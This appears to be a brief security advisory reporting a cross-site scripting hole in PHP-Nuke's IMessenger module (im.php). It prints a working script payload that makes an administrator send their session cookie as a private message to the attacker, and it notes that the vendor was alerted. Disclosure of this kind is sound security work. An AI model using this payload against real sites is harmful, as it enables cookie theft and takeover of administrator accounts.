Security hole in IMessenger ( PHP-Nuke )

[frog frog <leseulfrog () hotmail com>]

There is a big hole in imessenger (im.php). He 
accept javascript... if I send

<*s*cript>window.location.href='http://www.
[SERVER].com/im.php?username_to= [MY_NICK] 
&subject='+ document.cookie 
+'&message=message&action=send' ;</script>

(without '*') to the admin, he send his cookie.

PHPNuke has been alerted.
There's a tut (french) here :

http://balteam.multimania.com/Tuts/imhole.txt

frog-m@n